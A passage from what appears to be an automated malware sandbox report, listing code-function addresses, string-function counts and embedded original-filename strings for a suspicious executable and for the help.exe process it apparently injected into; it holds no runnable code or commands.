                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008D3E400_2_008D3E40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008D6F920_2_008D6F92
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008DD87C0_2_008DD87C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_04AB87240_2_04AB8724
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_04AB02A00_2_04AB02A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_04AB02900_2_04AB0290
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_04ABBC480_2_04ABBC48
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_06FB26400_2_06FB2640
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_06FBCFB00_2_06FBCFB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_06FB26320_2_06FB2632
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_06FBCA000_2_06FBCA00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_06FBC9F00_2_06FBC9F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004187233_2_00418723
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004028F03_2_004028F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040E1093_2_0040E109
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040E1133_2_0040E113
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004169233_2_00416923
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004101333_2_00410133
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040E2583_2_0040E258
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040E2633_2_0040E263
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004032703_2_00403270
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004012303_2_00401230
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040E2AC3_2_0040E2AC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0042EC133_2_0042EC13
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004025303_2_00402530
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004045A73_2_004045A7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004046243_2_00404624
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040FF0A3_2_0040FF0A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040FF133_2_0040FF13
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A341A23_2_01A341A2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A401AA3_2_01A401AA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A381CC3_2_01A381CC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019701003_2_01970100
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1A1183_2_01A1A118
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A081583_2_01A08158
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A120003_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A403E63_2_01A403E6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E3F03_2_0198E3F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3A3523_2_01A3A352
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A002C03_2_01A002C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A202743_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A405913_2_01A40591
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019805353_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2E4F63_2_01A2E4F6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A244203_2_01A24420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A324463_2_01A32446
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197C7C03_2_0197C7C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A47503_2_019A4750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019807703_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199C6E03_2_0199C6E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A4A9A63_2_01A4A9A6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A03_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019969623_2_01996962
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019668B83_2_019668B8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE8F03_2_019AE8F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198A8403_2_0198A840
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019828403_2_01982840
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A36BD73_2_01A36BD7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3AB403_2_01A3AB40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA803_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01998DBF3_2_01998DBF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197ADE03_2_0197ADE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198AD003_2_0198AD00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1CD1F3_2_01A1CD1F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20CB53_2_01A20CB5
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970CF23_2_01970CF2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980C003_2_01980C00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FEFA03_2_019FEFA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01972FC83_2_01972FC8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198CFE03_2_0198CFE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A22F303_2_01A22F30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A0F303_2_019A0F30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C2F283_2_019C2F28
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F4F403_2_019F4F40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992E903_2_01992E90
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3CE933_2_01A3CE93
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3EEDB3_2_01A3EEDB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3EE263_2_01A3EE26
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980E593_2_01980E59
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198B1B03_2_0198B1B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A4B16B3_2_01A4B16B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196F1723_2_0196F172
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B516C3_2_019B516C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3F0E03_2_01A3F0E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A370E93_2_01A370E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019870C03_2_019870C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2F0CC3_2_01A2F0CC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C739A3_2_019C739A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3132D3_2_01A3132D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196D34C3_2_0196D34C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019852A03_2_019852A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A212ED3_2_01A212ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199B2C03_2_0199B2C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1D5B03_2_01A1D5B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A495C33_2_01A495C3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A375713_2_01A37571
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3F43F3_2_01A3F43F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019714603_2_01971460
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3F7B03_2_01A3F7B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A316CC3_2_01A316CC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C56303_2_019C5630
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A159103_2_01A15910
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019899503_2_01989950
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199B9503_2_0199B950
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019838E03_2_019838E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019ED8003_2_019ED800
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199FB803_2_0199FB80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019BDBF93_2_019BDBF9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F5BF03_2_019F5BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3FB763_2_01A3FB76
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A21AA33_2_01A21AA3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1DAAC3_2_01A1DAAC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C5AA03_2_019C5AA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2DAC63_2_01A2DAC6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A37A463_2_01A37A46
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3FA493_2_01A3FA49
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F3A6C3_2_019F3A6C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199FDC03_2_0199FDC0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A37D733_2_01A37D73
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01983D403_2_01983D40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A31D5A3_2_01A31D5A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3FCF23_2_01A3FCF2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F9C323_2_019F9C32
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01981F923_2_01981F92
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3FFB13_2_01A3FFB1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01943FD53_2_01943FD5
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01943FD23_2_01943FD2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3FF093_2_01A3FF09
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01989EB03_2_01989EB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D302C06_2_02D302C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D502746_2_02D50274
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D703E66_2_02D703E6
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CBE3F06_2_02CBE3F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6A3526_2_02D6A352
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D420006_2_02D42000
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D681CC6_2_02D681CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D641A26_2_02D641A2
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D701AA6_2_02D701AA
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D381586_2_02D38158
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CA01006_2_02CA0100
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D4A1186_2_02D4A118
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CCC6E06_2_02CCC6E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CAC7C06_2_02CAC7C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CD47506_2_02CD4750
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB07706_2_02CB0770
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D5E4F66_2_02D5E4F6
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D624466_2_02D62446
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D544206_2_02D54420
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D705916_2_02D70591
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB05356_2_02CB0535
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CAEA806_2_02CAEA80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D66BD76_2_02D66BD7
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6AB406_2_02D6AB40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CDE8F06_2_02CDE8F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C968B86_2_02C968B8
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CBA8406_2_02CBA840
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB28406_2_02CB2840
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB29A06_2_02CB29A0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D7A9A66_2_02D7A9A6
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CC69626_2_02CC6962
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6EEDB6_2_02D6EEDB
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6CE936_2_02D6CE93
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CC2E906_2_02CC2E90
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB0E596_2_02CB0E59
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6EE266_2_02D6EE26
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CA2FC86_2_02CA2FC8
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CBCFE06_2_02CBCFE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D2EFA06_2_02D2EFA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D24F406_2_02D24F40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D52F306_2_02D52F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CF2F286_2_02CF2F28
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CD0F306_2_02CD0F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CA0CF26_2_02CA0CF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D50CB56_2_02D50CB5
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB0C006_2_02CB0C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CAADE06_2_02CAADE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CC8DBF6_2_02CC8DBF
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CBAD006_2_02CBAD00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D4CD1F6_2_02D4CD1F
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CCB2C06_2_02CCB2C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D512ED6_2_02D512ED
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB52A06_2_02CB52A0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CF739A6_2_02CF739A
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C9D34C6_2_02C9D34C
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6132D6_2_02D6132D
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB70C06_2_02CB70C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D5F0CC6_2_02D5F0CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6F0E06_2_02D6F0E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D670E96_2_02D670E9
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CBB1B06_2_02CBB1B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE516C6_2_02CE516C
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C9F1726_2_02C9F172
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D7B16B6_2_02D7B16B
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D616CC6_2_02D616CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CF56306_2_02CF5630
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6F7B06_2_02D6F7B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CA14606_2_02CA1460
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6F43F6_2_02D6F43F
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D795C36_2_02D795C3
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D4D5B06_2_02D4D5B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D675716_2_02D67571
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D5DAC66_2_02D5DAC6
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CF5AA06_2_02CF5AA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D51AA36_2_02D51AA3
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D4DAAC6_2_02D4DAAC
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D67A466_2_02D67A46
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6FA496_2_02D6FA49
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D23A6C6_2_02D23A6C
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D25BF06_2_02D25BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CEDBF96_2_02CEDBF9
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CCFB806_2_02CCFB80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6FB766_2_02D6FB76
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB38E06_2_02CB38E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D1D8006_2_02D1D800
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB99506_2_02CB9950
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CCB9506_2_02CCB950
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D459106_2_02D45910
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB9EB06_2_02CB9EB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C73FD56_2_02C73FD5
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C73FD26_2_02C73FD2
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB1F926_2_02CB1F92
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6FFB16_2_02D6FFB1
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6FF096_2_02D6FF09
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D6FCF26_2_02D6FCF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D29C326_2_02D29C32
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CCFDC06_2_02CCFDC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CB3D406_2_02CB3D40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D61D5A6_2_02D61D5A
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02D67D736_2_02D67D73
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00611B906_2_00611B90
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060CA206_2_0060CA20
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060CA176_2_0060CA17
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060CC406_2_0060CC40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060AC206_2_0060AC20
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060AC166_2_0060AC16
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060AD656_2_0060AD65
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060AD706_2_0060AD70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0060ADB96_2_0060ADB9
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_006010B46_2_006010B4
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_006011316_2_00601131
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_006152306_2_00615230
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_006134306_2_00613430
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0062B7206_2_0062B720
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_030852646_2_03085264
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307E2F76_2_0307E2F7
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307E1D86_2_0307E1D8
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307D7586_2_0307D758
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307E68D6_2_0307E68D
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307C9636_2_0307C963
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0307C9F86_2_0307C9F8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: String function: 019C7E54 appears 111 times
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: String function: 019FF290 appears 105 times
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: String function: 019EEA12 appears 86 times
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: String function: 0196B970 appears 280 times
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: String function: 019B5130 appears 58 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02CF7E54 appears 111 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02D1EA12 appears 86 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02D2F290 appears 105 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02CE5130 appears 58 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02C9B970 appears 280 times
                Source: mKv3sKQ5Q4E7waF.exeBinary or memory string: OriginalFilename vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.845792819.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.00000000026B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.864590116.0000000006DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.866107737.0000000008302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.866107737.0000000008302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename] vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.868241767.00000000084F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000000.833808576.00000000001B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezpaD.exe> vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001A6D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs mKv3sKQ5Q4E7waF.exe
